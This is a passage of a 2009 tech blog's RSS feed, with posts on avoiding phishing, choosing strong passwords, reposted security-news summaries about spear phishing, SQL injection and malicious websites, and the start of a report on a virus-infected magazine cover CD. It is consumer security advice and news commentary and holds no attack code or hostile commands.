<li><span style="font-weight: bold;">Be wary of the &#8220;fabulous offers&#8221; and &#8220;fantastic prizes&#8221; that you&#8217;ll sometimes come across on the web.</span><span style="font-weight: bold;"> </span>If something seems too good to be true, it probably is, and it could be a phisher trying to steal your information. Whenever you come across an offer online that requires you to share personal or other sensitive information to take advantage of it, be sure to ask lots of questions and check the site asking for your information for signs of anything suspicious.</li>
</ul>
<ul>
<li><span style="font-weight: bold;">Use a browser that has a phishing filter.</span><span style="font-weight: bold;"> </span>The latest versions of most browsers &#8212; including <a id="f846" title="Firefox" href="http://www.mozilla.com/en-US/firefox/">Firefox</a>, <a id="jj0_" title="Internet Explorer" href="http://www.microsoft.com/windows/products/winfamily/ie/default.mspx">Internet Explorer</a>, and <a id="csp_" title="Opera" href="http://www.opera.com/">Opera</a> &#8212; include phishing filters that can help you spot potential phishing attacks.</li>
</ul>
<p>All fairly simple, right? What it all comes down to is if someone asks you to share personal or other sensitive information online, take a moment to think through the request carefully. Doing so will help you stay safe online, and help us all put phishers out of business.</p>
]]></content:encoded>
			<wfw:commentRss>http://techblog.cyberphunkz.com/2009/10/12/how-to-avoid-getting-hooked/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Choosing Smarter Passwords</title>
		<link>http://techblog.cyberphunkz.com/2009/10/12/choosing-smarter-passwords/</link>
		<comments>http://techblog.cyberphunkz.com/2009/10/12/choosing-smarter-passwords/#comments</comments>
		<pubDate>Mon, 12 Oct 2009 11:05:37 +0000</pubDate>
		<dc:creator>Freak</dc:creator>
				<category><![CDATA[Common Sense]]></category>
		<category><![CDATA[Geek]]></category>
		<category><![CDATA[hacking]]></category>
		<category><![CDATA[orkut]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[password]]></category>
		<category><![CDATA[phishing]]></category>

		<guid isPermaLink="false">http://techblog.cyberphunkz.com/?p=390</guid>
		<description><![CDATA[Phishing, a topic that&#8217;s been in the news, is unfortunately a common way for hackers to trick you into sharing personal information like your account password. If you suspect you&#8217;ve been a victim of a phishing attack, we recommend you immediately change your password, update the security question and secondary address on your account, and &#8230; </p><p><a class="more-link block-button" href="http://techblog.cyberphunkz.com/2009/10/12/choosing-smarter-passwords/">Continue reading &#187;</a>]]></description>
			<content:encoded><![CDATA[<p>Phishing, a topic that&#8217;s been in the news, is unfortunately a common way for hackers to trick you into sharing personal information like your account password. If you suspect you&#8217;ve been a victim of a phishing attack, we recommend you immediately change your password, update the security question and secondary address on your account, and make sure you&#8217;re using a modern browser with anti-phishing protection turned on.</p>
<p>Creating a new password is often one of the first recommendations you hear when trouble occurs. Even a great password can&#8217;t keep you from being scammed, but setting one that&#8217;s memorable for you and that&#8217;s hard for others to guess is a smart security practice since weak passwords can be easily guessed. Below are a few common problems we&#8217;ve seen in the past and suggestions for making your passwords stronger.</p>
<p><span style="font-weight: bold;">Problem 1: Re-using passwords across websites</span><br />
With a constantly growing list of services that require a password (email, online banking, social networking, and shopping websites — just to name a few), it&#8217;s no wonder that many people simply use the same password across a variety of accounts. This is risky: if someone figures out your password for one service, that person could potentially gain access to your private email, address information, and even your money.</p>
<p><span style="font-weight: bold;">Solution 1: Use unique passwords</span><br />
It&#8217;s a good idea to use unique passwords for your accounts, expecially important accounts like email and online banking. When you create a password for a site, you might think of a phrase you associate with the site and use an abbreviation or variation of that phrase as your password — just don&#8217;t use the actual words of the site. If it&#8217;s a long phrase, you can take the first letter of each word. To make this word or phrase more secure, try making some letters uppercase, and swap out some letters with numbers or symbols. As an example, the phrase for your banking website could be &#8220;How much money do I have?&#8221; and the password could be &#8220;#m$d1H4ve?&#8221; (Note: since we&#8217;re using them here, please don&#8217;t adopt any of the example passwords in this post for yourself.)</p>
<p><span style="font-weight: bold;">Problem 2: Using common passwords or words found in the dictionary</span><br />
Common passwords include simple words or phrases like &#8220;password&#8221; or &#8220;letmein,&#8221; keyboard patterns such as &#8220;qwerty&#8221; or &#8220;qazwsx,&#8221; or sequential patterns such as &#8220;abcd1234.&#8221; Using a simple password or any word you can find in the dictionary makes it easier for a would-be hijacker to gain access to your personal information.</p>
<p><span style="font-weight: bold;">Solution 2: Use a password with a mix of letters, numbers, and symbols</span><br />
There are only 26^8 possible permutations for an 8-character password that uses just lowercase letters, while there are 94^8 possible permutations for an 8-character password that uses a combination of mixed-case letters, numbers, and symbols. That&#8217;s over 6 quadrillion more possible variations for a mixed password, which makes it that much harder for anyone to guess or crack.</p>
<form method="post" action=""><input type="hidden" name="ip" value="38.107.179.214" /><p><label for="s2email">Your email:</label><br /><input type="text" name="email" id="s2email" value="Enter email address..." size="20" onfocus="if (this.value == 'Enter email address...') {this.value = '';}" onblur="if (this.value == '') {this.value = 'Enter email address...';}" /></p><p><input type="submit" name="subscribe" value="Subscribe" />&nbsp;<input type="submit" name="unsubscribe" value="Unsubscribe" /></p></form>
<span id="more-390"></span><br />
<span style="font-weight: bold;">Problem 3: Using passwords based on personal data</span><br />
We all share information about ourselves with our friends and coworkers. The names of your spouse, children, or pets aren&#8217;t usually all that secret, so it doesn&#8217;t make sense to use them as your passwords. You should also stay away from birth dates, phone numbers, or addresses.</p>
<p><span style="font-weight: bold;">Solution 3: Create a password that&#8217;s hard for others to guess</span><br />
Choose a combination of letters, numbers, or symbols to create a unique password that&#8217;s unrelated to your personal information. Or, select a random word or phrase, and insert letters and numbers into the beginning, middle, and end to make it extra difficult to guess (such as &#8220;sPo0kyh@ll0w3En&#8221;).</p>
<p><span style="font-weight: bold;">Problem 4: Writing down your password and storing it in an unsecured place</span><br />
Some of us have enough online accounts that we may need to write our passwords down somewhere, at least until we&#8217;ve learned them well.</p>
<p><span style="font-weight: bold;">Solution 4: Keep your password reminders in a secret place that isn&#8217;t easily visible</span><br />
Don&#8217;t leave notes with your passwords to various sites on your computer or desk. People who walk by can easily steal this information and use it to compromise your account. Also, if you decide to save your passwords in a file on your computer, create a unique name for the file so people don&#8217;t know what&#8217;s inside. Avoid naming the file &#8220;my passwords&#8221; or something else obvious.</p>
<p><span style="font-weight: bold;">Problem 5: Recalling your password</span><br />
When choosing smart passwords like these, it can often be more difficult to remember your password when you try to sign in to a site you haven&#8217;t visited in a while. To get around this problem, many websites will offer you the option to either send a password-reset link to your email address or answer a security question.</p>
<p><span style="font-weight: bold;">Solution 5: Make sure your password recovery options are up-to-date and secure</span><br />
You should always make sure you have an up-to-date email address on file for each account you have, so that if you need to send a password reset email it goes to the right place.</p>
<p>Many websites will ask you to choose a question to verify your identity if you ever forget your password. If you&#8217;re able to create your own question, try to come up with a question that has an answer only you would know. The answer shouldn&#8217;t be something that someone can guess by scanning information you&#8217;ve posted online in social networking profiles, blogs, and other places.</p>
<p>If you&#8217;re asked to choose a question from a list of options, such as the city where you were born, you should be aware that these questions are likely to be less secure. Try to find a way to make your answer unique — you can do this by using some of the tips above, or by creating a convention where you always add a symbol after the 2nd character in the answer (e.g. in@dianapolis) — so that even if someone guesses the answer, they won&#8217;t know how to enter it properly.</p>
]]></content:encoded>
			<wfw:commentRss>http://techblog.cyberphunkz.com/2009/10/12/choosing-smarter-passwords/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>RISK : Behind-the-times IT managers leave systems dangerously exposed</title>
		<link>http://techblog.cyberphunkz.com/2009/09/21/risk-behind-the-times-it-managers-leave-systems-dangerously-exposed/</link>
		<comments>http://techblog.cyberphunkz.com/2009/09/21/risk-behind-the-times-it-managers-leave-systems-dangerously-exposed/#comments</comments>
		<pubDate>Mon, 21 Sep 2009 15:05:31 +0000</pubDate>
		<dc:creator>Freak</dc:creator>
				<category><![CDATA[Geek]]></category>
		<category><![CDATA[hacking]]></category>
		<category><![CDATA[Irresponsible Activities]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[network hacking]]></category>
		<category><![CDATA[phishing]]></category>
		<category><![CDATA[spear phishing]]></category>
		<category><![CDATA[sql injection]]></category>

		<guid isPermaLink="false">http://techblog.cyberphunkz.com/?p=383</guid>
		<description><![CDATA[http://www.computerweekly.com/Articles/2009/09/18/237757/behind-the-times-it-managers-leave-systems-dangerously.htm IT departments are fighting the security battles of five or 10 years ago, unaware that their IT systems are dangerously exposed to computer hackers. That was the message from a study published this week by the US security education and research body the Sans Institute and security suppliers Tippingpoint and Qualys. The study is &#8230; </p><p><a class="more-link block-button" href="http://techblog.cyberphunkz.com/2009/09/21/risk-behind-the-times-it-managers-leave-systems-dangerously-exposed/">Continue reading &#187;</a>]]></description>
			<content:encoded><![CDATA[<p><span style="font-size: 11pt;"><a href="http://www.computerweekly.com/Articles/2009/09/18/237757/behind-the-times-it-managers-leave-systems-dangerously.htm" target="_blank">http://www.computerweekly.com/Articles/2009/09/18/237757/behind-the-times-it-managers-leave-systems-dangerously.htm</a></span></p>
<p><span style="font-size: 11pt;"> </span></p>
<p><span style="font-size: 11pt;">IT departments are fighting the security battles of five or 10 years ago, unaware that their IT systems are dangerously exposed to computer hackers.</span></p>
<p><span style="font-size: 11pt;"> </span></p>
<p><span style="font-size: 11pt;">That was the message from a study published this week by the US security education and research body the Sans Institute and security suppliers Tippingpoint and Qualys.</span></p>
<p><span style="font-size: 11pt;"> </span></p>
<p><span style="font-size: 11pt;">The study is the first to analyse systemically how cybercriminals are breaking into corporate IT systems. It draws on attack patterns recorded by intrusion detection systems in 6,000 organisations and software vulnerabilities detected in a further 9,000 firms.</span></p>
<p><span style="font-size: 11pt;"> </span></p>
<p><span style="font-size: 11pt;">Its findings will lead to a widespread reassessment of how companies spend their IT security budget, says Allen Paller, director of research at the Sans Institute.</span></p>
<p><span style="font-size: 11pt;"><form method="post" action=""><input type="hidden" name="ip" value="38.107.179.214" /><p><label for="s2email">Your email:</label><br /><input type="text" name="email" id="s2email" value="Enter email address..." size="20" onfocus="if (this.value == 'Enter email address...') {this.value = '';}" onblur="if (this.value == '') {this.value = 'Enter email address...';}" /></p><p><input type="submit" name="subscribe" value="Subscribe" />&nbsp;<input type="submit" name="unsubscribe" value="Unsubscribe" /></p></form>
<span id="more-383"></span></span></p>
<p><strong><span style="font-size: 11pt;">Fundamental error</span></strong></p>
<p><span style="font-size: 11pt;"> </span></p>
<p><span style="font-size: 11pt;">The study shows that chief security officers are spending most of their budgets ensuring that the operating systems of their PCs and servers are patched. But many hackers are directing their attacks against vulnerabilities in web applications and common desktop software, bypassing the operating system entirely.</span></p>
<p><span style="font-size: 11pt;"> </span></p>
<p><span style="font-size: 11pt;">Vulnerabilities in commonly used desktop software programs, including Adobe PDF, QuickTime, Adobe Flash and Microsoft Office, and in web applications accounted for 60% of hacking attacks recorded over the past five months.</span></p>
<p><span style="font-size: 11pt;"> </span></p>
<p><span style="font-size: 11pt;">&#8220;IT departments are still celebrating their success at patching operating systems. They think they are doing great, but they are using the wrong metrics,&#8221; says Rob Lee, faculty leader in forensics at the Sans Institute.</span></p>
<p><span style="font-size: 11pt;"> </span></p>
<p><span style="font-size: 11pt;">The greatest risk to corporate IT systems, comes form hackers exploiting vulnerabilities in popular websites to plant and spread malicious code on a huge scale.</span></p>
<p><span style="font-size: 11pt;"> </span></p>
<p><span style="font-size: 11pt;">Employees feel safe visiting trusted sites from their work places, but they are easily fooled into opening documents, music and video files that contain malicious code.</span></p>
<p><span style="font-size: 11pt;"> </span></p>
<p><span style="font-size: 11pt;">Once downloaded, the code exploits vulnerabilities in unpatched applications on their desktops, allowing hackers to plant backdoors that can provide them access to corporate networks.</span></p>
<p><span style="font-size: 11pt;"> </span></p>
<p><strong><span style="font-size: 11pt;">Spear phishing</span></strong></p>
<p><span style="font-size: 11pt;"> </span></p>
<p><span style="font-size: 11pt;">Hackers are using another technique known as spear phishing &#8211; targeted e-mails containing malware &#8211; to exploit the same application vulnerabilities.</span></p>
<p><span style="font-size: 11pt;"> </span></p>
<p><span style="font-size: 11pt;">Over the past year, the Sans team has responded to 40 major security incidents in businesses and government departments. Two-thirds have been spear phishing attacks.</span></p>
<p><span style="font-size: 11pt;"> </span></p>
<p><span style="font-size: 11pt;">&#8220;We have recently seen financial attackers using spear phishing campaigns against chief financial officers to get them to click on a link. They install a key logger. Once an individual logs into the bank account, the hackers get in and start moving funds,&#8221; says Lee.</span></p>
<p><span style="font-size: 11pt;"> </span></p>
<p><span style="font-size: 11pt;">There are some straightforward measures that business can take to protect themselves, says the Sans Institute.</span></p>
<p><span style="font-size: 11pt;"> </span></p>
<p><span style="font-size: 11pt;">Small businesses can deploy a separate hardened PC for staff to use for financial transactions online. And for all companies, deploying a web application firewall will help to protect web applications from malicious attacks.</span></p>
<p><span style="font-size: 11pt;"> </span></p>
<p><span style="font-size: 11pt;">&#8220;For the client side, get code patched and get it patched more quickly. The idea that you can patch operating systems in a week is great news. But that is focusing on the attacks of a couple of years ago,&#8221; says Ed Skoudis, security consultant at the Internet Storm Centre, which monitors hacking activity.</span></p>
<p><span style="font-size: 11pt;"> </span></p>
<p><span style="font-size: 11pt;">The other point, he says, is that companies should redouble their efforts to make sure users do not log into their machines with administrator privileges. &#8220;That way, if there is some sort of exploit, and the bad guys get a toe hold, it is only with limited privileges,&#8221; he says.</span></p>
<p><span style="font-size: 11pt;"> </span></p>
<p><strong><em><span style="font-size: 11pt;">SQL injection attacks</span></em></strong></p>
<p><em><span style="font-size: 11pt;"> </span></em></p>
<p><em><span style="font-size: 11pt;">SQL injection is the most common technique used by hackers to compromise web applications. The technique can be blocked by careful coding, but the Sans Institute warns that some programmers are creating applications that use SQL injection, leaving their networks open to attack from hackers.</span></em></p>
<p><em><span style="font-size: 11pt;"> </span></em></p>
<p><em><span style="font-size: 11pt;">&#8220;People writing these applications do not realise that they have put SQL injection in code as a feature. We find a lot of these applications in company networks. Things that people have put together quickly,&#8221; says Rohit Dhamankar director of security research at Tippingpoint.</span></em></p>
]]></content:encoded>
			<wfw:commentRss>http://techblog.cyberphunkz.com/2009/09/21/risk-behind-the-times-it-managers-leave-systems-dangerously-exposed/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>RISE : 671% increase of malicious Web sites</title>
		<link>http://techblog.cyberphunkz.com/2009/09/16/rise-671-increase-of-malicious-web-sites/</link>
		<comments>http://techblog.cyberphunkz.com/2009/09/16/rise-671-increase-of-malicious-web-sites/#comments</comments>
		<pubDate>Wed, 16 Sep 2009 15:17:21 +0000</pubDate>
		<dc:creator>Freak</dc:creator>
				<category><![CDATA[Common Sense]]></category>
		<category><![CDATA[Geek]]></category>
		<category><![CDATA[hacking]]></category>
		<category><![CDATA[Irresponsible Activities]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[malicious sites]]></category>
		<category><![CDATA[malware]]></category>
		<category><![CDATA[spam]]></category>

		<guid isPermaLink="false">http://techblog.cyberphunkz.com/?p=385</guid>
		<description><![CDATA[http://www.net-security.org/malware_news.php?id=1108 Websense revealed the findings from its bi-annual research report. Its security labs identified a 233 percent growth in the number of malicious sites in the last six months and 671 percent growth in the number of malicious sites during the last year. In the first half of 2009, 77 percent of Web sites with &#8230; </p><p><a class="more-link block-button" href="http://techblog.cyberphunkz.com/2009/09/16/rise-671-increase-of-malicious-web-sites/">Continue reading &#187;</a>]]></description>
			<content:encoded><![CDATA[<p><span style="font-size: 11pt;"><a href="http://www.net-security.org/malware_news.php?id=1108" target="_blank">http://www.net-security.org/malware_news.php?id=1108</a></span></p>
<p><span style="font-size: 11pt;"> </span></p>
<p><span style="font-size: 11pt;">Websense revealed the findings from its bi-annual research report. Its security labs identified a 233 percent growth in the number of malicious sites in the last six months and 671 percent growth in the number of malicious sites during the last year.</span></p>
<p><span style="font-size: 11pt;"> </span></p>
<p><span style="font-size: 11pt;">In the first half of 2009, 77 percent of Web sites with malicious code are legitimate sites that have been compromised. This high percentage was maintained over the past six months due in part to widespread attacks including Gumblar, Beladen and Nine Ball which aimed to compromise trusted and known Web properties with massive injection campaigns.</span></p>
<p><span style="font-size: 11pt;"> </span></p>
<p><span style="font-size: 11pt;">Efforts to self police Web 2.0 properties have been largely ineffective. Websense research shows that community-driven security tools used on sites like YouTube and BlogSpot are 65 percent to 75 percent ineffective in protecting Web users from objectionable content and security risks.</span></p>
<p><span style="font-size: 11pt;"><form method="post" action=""><input type="hidden" name="ip" value="38.107.179.214" /><p><label for="s2email">Your email:</label><br /><input type="text" name="email" id="s2email" value="Enter email address..." size="20" onfocus="if (this.value == 'Enter email address...') {this.value = '';}" onblur="if (this.value == '') {this.value = 'Enter email address...';}" /></p><p><input type="submit" name="subscribe" value="Subscribe" />&nbsp;<input type="submit" name="unsubscribe" value="Unsubscribe" /></p></form>
<span id="more-385"></span></span></p>
<p><span style="font-size: 11pt;">The &#8220;dirty&#8221; Web is getting dirtier: 69 percent of all Web pages with content classified as objectionable also had at least one malicious link. This is becoming even more pervasive, as 78 percent of new Web pages discovered in the first half of 2009 with objectionable content had at least one malicious link.</span></p>
<p><span style="font-size: 11pt;"> </span></p>
<p><span style="font-size: 11pt;">The Web continues to be the most popular vector for data-stealing attacks. In the first half of 2009, 57 percent of data-stealing attacks are conducted over the Web. 37 percent of malicious Web attacks included data-stealing code, demonstrating that attackers are after essential information and data.</span></p>
<p><span style="font-size: 11pt;"> </span></p>
<p><span style="font-size: 11pt;">The convergence of blended Web and email threats continues to increase. Websense reports that 85.6 percent of all unwanted emails in circulation during this period contained links to spam sites and/or malicious Web sites. In June alone, the total number of emails detected as containing viruses increased 600 percent over the previous month.</span></p>
]]></content:encoded>
			<wfw:commentRss>http://techblog.cyberphunkz.com/2009/09/16/rise-671-increase-of-malicious-web-sites/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>How to avoid the “500 worst passwords of all time”</title>
		<link>http://techblog.cyberphunkz.com/2009/09/10/how-to-avoid-the-%e2%80%9c500-worst-passwords-of-all-time%e2%80%9d/</link>
		<comments>http://techblog.cyberphunkz.com/2009/09/10/how-to-avoid-the-%e2%80%9c500-worst-passwords-of-all-time%e2%80%9d/#comments</comments>
		<pubDate>Thu, 10 Sep 2009 16:07:14 +0000</pubDate>
		<dc:creator>Freak</dc:creator>
				<category><![CDATA[Bad Ideas]]></category>
		<category><![CDATA[Common Sense]]></category>
		<category><![CDATA[Geek]]></category>
		<category><![CDATA[hacking]]></category>
		<category><![CDATA[How To?]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[password]]></category>
		<category><![CDATA[worst]]></category>

		<guid isPermaLink="false">http://techblog.cyberphunkz.com/?p=368</guid>
		<description><![CDATA[We all have lots of Internet passwords and about half of them are not difficult to guess. Just take a look at the “500 worst passwords of all time.” A strong password should be two things: easily recalled by its owner and difficult to guess by someone who doesn’t know it. So even non-hackers can &#8230; </p><p><a class="more-link block-button" href="http://techblog.cyberphunkz.com/2009/09/10/how-to-avoid-the-%e2%80%9c500-worst-passwords-of-all-time%e2%80%9d/">Continue reading &#187;</a>]]></description>
			<content:encoded><![CDATA[<p style="margin-top: 15px; margin-right: 0px; margin-bottom: 15px; margin-left: 0px; outline-width: 0px; outline-style: initial; outline-color: initial; font-weight: inherit; font-style: inherit; font-size: 14px; font-family: inherit; vertical-align: baseline; line-height: 1.29em; padding: 0px; border: 0px initial initial;">We all have lots of Internet passwords and about half of them are not difficult to guess. Just take a look at the “<a style="outline-width: initial; outline-style: none; outline-color: initial; font-weight: inherit; font-style: inherit; font-size: 14px; font-family: inherit; vertical-align: baseline; color: #005399; text-decoration: none; cursor: pointer; padding: 0px; margin: 0px; border: 0px initial initial;" href="http://www.whatsmypass.com/the-top-500-worst-passwords-of-all-time">500 worst passwords of all time</a>.”</p>
<p style="margin-top: 15px; margin-right: 0px; margin-bottom: 15px; margin-left: 0px; outline-width: 0px; outline-style: initial; outline-color: initial; font-weight: inherit; font-style: inherit; font-size: 14px; font-family: inherit; vertical-align: baseline; line-height: 1.29em; padding: 0px; border: 0px initial initial;">A strong password should be two things: easily recalled by its owner and difficult to guess by someone who doesn’t know it. So even non-hackers can guess a few on the worst list.</p>
<p style="margin-top: 15px; margin-right: 0px; margin-bottom: 15px; margin-left: 0px; outline-width: 0px; outline-style: initial; outline-color: initial; font-weight: inherit; font-style: inherit; font-size: 14px; font-family: inherit; vertical-align: baseline; line-height: 1.29em; padding: 0px; border: 0px initial initial;">“123456? is number one followed by you guessed it, “password.” Some on the list are intriguing. Number 496 is a “mistress” although I don’t know if the owners lean toward kept women or men who wished they had one. Many are profane with a hint of anger and impulsiveness suggesting people don’t want to bother with passwords. Some are plays on words like “letmein.” Number 486 is a seemingly cryptic letter string “abgrtyu” and still made the list.</p>
<p style="margin-top: 15px; margin-right: 0px; margin-bottom: 15px; margin-left: 0px; outline-width: 0px; outline-style: initial; outline-color: initial; font-weight: inherit; font-style: inherit; font-size: 14px; font-family: inherit; vertical-align: baseline; line-height: 1.29em; padding: 0px; border: 0px initial initial;">The list comes from the book “<a style="outline-width: initial; outline-style: none; outline-color: initial; font-weight: inherit; font-style: inherit; font-size: 14px; font-family: inherit; vertical-align: baseline; color: #005399; text-decoration: none; cursor: pointer; padding: 0px; margin: 0px; border: 0px initial initial;" href="http://www.amazon.com/gp/product/1597490415?ie=UTF8&amp;tag=boingboing0e-20&amp;linkCode=as2&amp;camp=1789&amp;creative=390957&amp;creativeASIN=1597490415">Perfect Password: Selecttion, Protection, Authentication</a>” published in 2005. While the list would appear outdated, it still gets considerable attention because it’s unique.</p>
<p style="margin-top: 15px; margin-right: 0px; margin-bottom: 15px; margin-left: 0px; outline-width: 0px; outline-style: initial; outline-color: initial; font-weight: inherit; font-style: inherit; font-size: 14px; font-family: inherit; vertical-align: baseline; line-height: 1.29em; padding: 0px; border: 0px initial initial;"><form method="post" action=""><input type="hidden" name="ip" value="38.107.179.214" /><p><label for="s2email">Your email:</label><br /><input type="text" name="email" id="s2email" value="Enter email address..." size="20" onfocus="if (this.value == 'Enter email address...') {this.value = '';}" onblur="if (this.value == '') {this.value = 'Enter email address...';}" /></p><p><input type="submit" name="subscribe" value="Subscribe" />&nbsp;<input type="submit" name="unsubscribe" value="Unsubscribe" /></p></form>
<span id="more-368"></span></p>
<p style="margin-top: 15px; margin-right: 0px; margin-bottom: 15px; margin-left: 0px; outline-width: 0px; outline-style: initial; outline-color: initial; font-weight: inherit; font-style: inherit; font-size: 14px; font-family: inherit; vertical-align: baseline; line-height: 1.29em; padding: 0px; border: 0px initial initial;">One out of nine passwords used is on the list and about 50% of passwords are “based on names of a family member, spouse, partner, or a pet,” according to the book’s teaser on Amazon. Just ask <a style="outline-width: initial; outline-style: none; outline-color: initial; font-weight: inherit; font-style: inherit; font-size: 14px; font-family: inherit; vertical-align: baseline; color: #005399; text-decoration: none; cursor: pointer; padding: 0px; margin: 0px; border: 0px initial initial;" href="http://www.wired.com/threatlevel/2008/09/palin-e-mail-ha/">Sarah Palin whose email</a> was hacked last September by someone who reset her password using her zipcode, birthdate and where she met her spouse. When asked where she went to high school, the hacker entered  “Wasilla High” and was right. Such is the price of celebrity and people knowing a lot about you.</p>
<p style="margin-top: 15px; margin-right: 0px; margin-bottom: 15px; margin-left: 0px; outline-width: 0px; outline-style: initial; outline-color: initial; font-weight: inherit; font-style: inherit; font-size: 14px; font-family: inherit; vertical-align: baseline; line-height: 1.29em; padding: 0px; border: 0px initial initial;">Passwords are a challenge. Like you, I often want quick access to a site and view the password as an obstacle deserving little attention. However, I can proudly say no password I have ever used is on the worst list.</p>
<p style="margin-top: 15px; margin-right: 0px; margin-bottom: 15px; margin-left: 0px; outline-width: 0px; outline-style: initial; outline-color: initial; font-weight: inherit; font-style: inherit; font-size: 14px; font-family: inherit; vertical-align: baseline; line-height: 1.29em; padding: 0px; border: 0px initial initial;">In a recent discussion with fellow bloggers, one said he keeps passwords only in his head. He never writes them down ANYWHERE. I have far too many for that and lack the photographic mind he must have. He also avoids passwords hints such as a boyhood dog or mother’s maiden name given what happened to Palin.</p>
<p style="margin-top: 15px; margin-right: 0px; margin-bottom: 15px; margin-left: 0px; outline-width: 0px; outline-style: initial; outline-color: initial; font-weight: inherit; font-style: inherit; font-size: 14px; font-family: inherit; vertical-align: baseline; line-height: 1.29em; padding: 0px; border: 0px initial initial;">Another swears by password manager <a style="outline-width: initial; outline-style: none; outline-color: initial; font-weight: inherit; font-style: inherit; font-size: 14px; font-family: inherit; vertical-align: baseline; color: #005399; text-decoration: none; cursor: pointer; padding: 0px; margin: 0px; border: 0px initial initial;" href="http://www.roboform.com/">Roboform</a> which can be downloaded for $35. I may try this given good reviews and because I don’t feel secure with my current password strategy if you can call it that. I am constantly looking them up and must have about 30 of them. I also have used <a style="outline-width: initial; outline-style: none; outline-color: initial; font-weight: inherit; font-style: inherit; font-size: 14px; font-family: inherit; vertical-align: baseline; color: #005399; text-decoration: none; cursor: pointer; padding: 0px; margin: 0px; border: 0px initial initial;" href="http://www.meebo.com/">meebo</a>with some success as a single logon/password to multiple instant messaging accounts. I tried something called a secure login named <a style="outline-width: initial; outline-style: none; outline-color: initial; font-weight: inherit; font-style: inherit; font-size: 14px; font-family: inherit; vertical-align: baseline; color: #005399; text-decoration: none; cursor: pointer; padding: 0px; margin: 0px; border: 0px initial initial;" href="http://vidoop.com/">vidoop</a>, but it was too good: it didn’t let me into anything.</p>
<p style="margin-top: 15px; margin-right: 0px; margin-bottom: 15px; margin-left: 0px; outline-width: 0px; outline-style: initial; outline-color: initial; font-weight: inherit; font-style: inherit; font-size: 14px; font-family: inherit; vertical-align: baseline; line-height: 1.29em; padding: 0px; border: 0px initial initial;">There’s plenty of advice on how to create a good password such as Microsoft’s <a style="outline-width: initial; outline-style: none; outline-color: initial; font-weight: inherit; font-style: inherit; font-size: 14px; font-family: inherit; vertical-align: baseline; color: #005399; text-decoration: none; cursor: pointer; padding: 0px; margin: 0px; border: 0px initial initial;" href="http://www.microsoft.com/protect/yourself/password/create.mspx">six-steps to creating “a strong, memorable password</a>. Some of the advice is obvious, but worth repeating.</p>
<p style="margin-top: 15px; margin-right: 0px; margin-bottom: 15px; margin-left: 0px; outline-width: 0px; outline-style: initial; outline-color: initial; font-weight: inherit; font-style: inherit; font-size: 14px; font-family: inherit; vertical-align: baseline; line-height: 1.29em; padding: 0px; border: 0px initial initial;">– Use a mix of symbols, characters and numbers. Use spaces if allowed.</p>
<p style="margin-top: 15px; margin-right: 0px; margin-bottom: 15px; margin-left: 0px; outline-width: 0px; outline-style: initial; outline-color: initial; font-weight: inherit; font-style: inherit; font-size: 14px; font-family: inherit; vertical-align: baseline; line-height: 1.29em; padding: 0px; border: 0px initial initial;">– If you can’t use symbols, double the number of characters.</p>
<p style="margin-top: 15px; margin-right: 0px; margin-bottom: 15px; margin-left: 0px; outline-width: 0px; outline-style: initial; outline-color: initial; font-weight: inherit; font-style: inherit; font-size: 14px; font-family: inherit; vertical-align: baseline; line-height: 1.29em; padding: 0px; border: 0px initial initial;">– Think of a memorable sentence and take the first letter of each word and combine into a password.</p>
<p style="margin-top: 15px; margin-right: 0px; margin-bottom: 15px; margin-left: 0px; outline-width: 0px; outline-style: initial; outline-color: initial; font-weight: inherit; font-style: inherit; font-size: 14px; font-family: inherit; vertical-align: baseline; line-height: 1.29em; padding: 0px; border: 0px initial initial;">– Use a <a style="outline-width: initial; outline-style: none; outline-color: initial; font-weight: inherit; font-style: inherit; font-size: 14px; font-family: inherit; vertical-align: baseline; color: #005399; text-decoration: none; cursor: pointer; padding: 0px; margin: 0px; border: 0px initial initial;" href="http://www.microsoft.com/protect/yourself/password/checker.mspx">password checker</a> to test its strength.</p>
]]></content:encoded>
			<wfw:commentRss>http://techblog.cyberphunkz.com/2009/09/10/how-to-avoid-the-%e2%80%9c500-worst-passwords-of-all-time%e2%80%9d/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>VIRUS : Magazine ships Induc Delphi virus on cover CD ROM</title>
		<link>http://techblog.cyberphunkz.com/2009/09/01/virus-magazine-ships-induc-delphi-virus-on-cover-cd-rom/</link>
		<comments>http://techblog.cyberphunkz.com/2009/09/01/virus-magazine-ships-induc-delphi-virus-on-cover-cd-rom/#comments</comments>
		<pubDate>Mon, 31 Aug 2009 20:06:58 +0000</pubDate>
		<dc:creator>Freak</dc:creator>
				<category><![CDATA[Bad Ideas]]></category>
		<category><![CDATA[Geek]]></category>
		<category><![CDATA[hacking]]></category>
		<category><![CDATA[Irresponsible Activities]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[cd rom]]></category>
		<category><![CDATA[virus]]></category>

		<guid isPermaLink="false">http://techblog.cyberphunkz.com/?p=359</guid>
		<description><![CDATA[According to German media reports, a popular computer magazine is on sale in the country containing a copy of the W32/Induc-A Delphi virus on its free cover CD ROM. The 18/2009 edition of ComputerBild, one of Germany&#8217;s biggest computer magazines with an estimated readership of over 4 million people, carries an infected copy of TidyFavorites &#8230; </p><p><a class="more-link block-button" href="http://techblog.cyberphunkz.com/2009/09/01/virus-magazine-ships-induc-delphi-virus-on-cover-cd-rom/">Continue reading &#187;</a>]]></description>
			<content:encoded><![CDATA[<div id="_mcePaste" style="overflow: hidden; position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px;">According to German media reports, a popular computer magazine is on sale in the country containing a copy of the W32/Induc-A Delphi virus on its free cover CD ROM.</div>
<div id="_mcePaste" style="overflow: hidden; position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px;">The 18/2009 edition of ComputerBild, one of Germany&#8217;s biggest computer magazines with an estimated readership of over 4 million people, carries an infected copy of TidyFavorites 4.1, a tool used to help you organise your browser&#8217;s list of favourite websites, on its cover CD.</div>
